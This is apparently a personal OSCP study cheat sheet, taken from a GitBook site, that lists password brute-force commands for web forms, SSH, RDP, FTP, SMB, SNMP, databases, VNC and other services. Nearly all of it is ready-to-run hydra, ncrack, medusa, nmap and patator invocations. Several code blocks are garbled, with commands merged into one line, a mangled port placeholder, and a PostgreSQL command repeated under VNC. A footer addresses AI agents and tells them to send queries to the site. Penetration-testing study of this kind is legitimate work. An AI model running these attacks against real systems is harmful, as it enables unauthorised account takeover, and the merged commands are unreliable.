# Brute-force service password

### Web <a href="#web" id="web"></a>

```
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin
```

#### Logins <a href="#logins" id="logins"></a>

Use Burp suite.

1. Intecept a login attempt.
2. Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
3. Select your payload, your wordlist.
4. Click attack.
5. Look for response-length that differs from the rest.​

#### HTTP Basic Auth <a href="#http-basic-auth" id="http-basic-auth"></a>

```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
```

#### HTTP - Post Form <a href="#http-post-form" id="http-post-form"></a>

```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
```

#### HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle <a href="#http-cms-w-ordpress-j-oomla-or-d-rupal-or-m-oodle" id="http-cms-w-ordpress-j-oomla-or-d-rupal-or-m-oodle"></a>

```
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```

#### Hydra attack http get 401 login with a dictionary <a href="#hydra-attack-http-get-401-login-with-a-dictionary" id="hydra-attack-http-get-401-login-with-a-dictionary"></a>

```
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
```

### SSH <a href="#ssh" id="ssh"></a>

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$ip
```

```
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
```

```
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
```

```
hydra -l root -P wordlist.txt $ip ssh
```

```
hydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -V
```

```
hydra -l root -P passwords.txt [-t 32] <IP> ssh
```

```
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
```

```
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
```

### SNMP <a href="#snmp" id="snmp"></a>

```
hydra -P wordlist.txt -v $ip snmp
```

```
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
```

```
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
```

```
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```

### Remote Desktop Protocol <a href="#remote-desktop-protocol" id="remote-desktop-protocol"></a>

```
ncrack -vv --user admin -P password-file.txt rdp://$ip
```

```
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
```

```
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
```

### AFP <a href="#afp" id="afp"></a>

```
nmap -p 548 --script afp-brute <IP>
```

### AJP <a href="#ajp" id="ajp"></a>

```
nmap --script ajp-brute -p 8009 <IP>
```

### Cassandra Apache <a href="#cassandra-apache" id="cassandra-apache"></a>

```
nmap --script cassandra-brute -p 9160 <IP>
```

### CouchDB <a href="#couchdb" id="couchdb"></a>

```
msf> use auxiliary/scanner/couchdb/couchdb_login
```

### FTP <a href="#ftp" id="ftp"></a>

```
hydra -l root -P passwords.txt [-t 32] <IP> ftpncrack -p 21 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
```

### IMAP <a href="#imap" id="imap"></a>

```
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V​hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V​nmap -sV --script imap-brute -p <PORT> <IP>
```

### IRC <a href="#irc" id="irc"></a>

```
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```

### ISCSI <a href="#iscsi" id="iscsi"></a>

```
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
```

### LDAP <a href="#ldap" id="ldap"></a>

```
nmap --script ldap-brute -p 389 <IP>
```

```
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f
```

### Mongo <a href="#mongo" id="mongo"></a>

```
nmap -sV --script mongodb-brute -n -p 27017 <IP>
```

### MySQL <a href="#mysql" id="mysql"></a>

```
hydra -L usernames.txt -P pass.txt <IP> mysql
```

### OracleSQL <a href="#oraclesql" id="oraclesql"></a>

```
pip3 install cx_Oracle --upgradepatator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
```

```
./odat.py passwordguesser -s $SERVER -d $SID./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
```

```
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
```

```
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30​john hashes.txt
```

### POP3 <a href="#pop3" id="pop3"></a>

```
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
```

```
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
```

### PostgreSQL <a href="#postgresql" id="postgresql"></a>

```
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
```

```
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
```

```
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
```

```
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
```

```
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
```

### PPTP <a href="#pptp" id="pptp"></a>

```
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
```

### Redis <a href="#redis" id="redis"></a>

```
nmap --script redis-brute -p 6379 <IP>​hydra –P /path/pass.txt <IP> redis
```

### Rexec <a href="#rexec" id="rexec"></a>

```
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```

### Rlogin <a href="#rlogin" id="rlogin"></a>

```
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```

### Rsh <a href="#rsh" id="rsh"></a>

```
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```

​[http://pentestmonkey.net/tools/misc/rsh-grind​](http://pentestmonkey.net/tools/misc/rsh-grind%E2%80%8B)​

### Rsync <a href="#rsync" id="rsync"></a>

```
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```

### RTSP <a href="#rtsp" id="rtsp"></a>

```
hydra -l root -P passwords.txt <IP> rtsp
```

### SMB <a href="#smb" id="smb"></a>

```
nmap --script smb-brute -p 445 <IP>​

hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
```

### Telnet <a href="#telnet" id="telnet"></a>

```
hydra -l root -P passwords.txt [-t 32] <IP> telnet​ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]​medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
```

### VNC <a href="#vnc" id="vnc"></a>

```
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc​medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc​ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
```

```
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
```

```
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
```

### SMTP <a href="#smtp" id="smtp"></a>

```
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.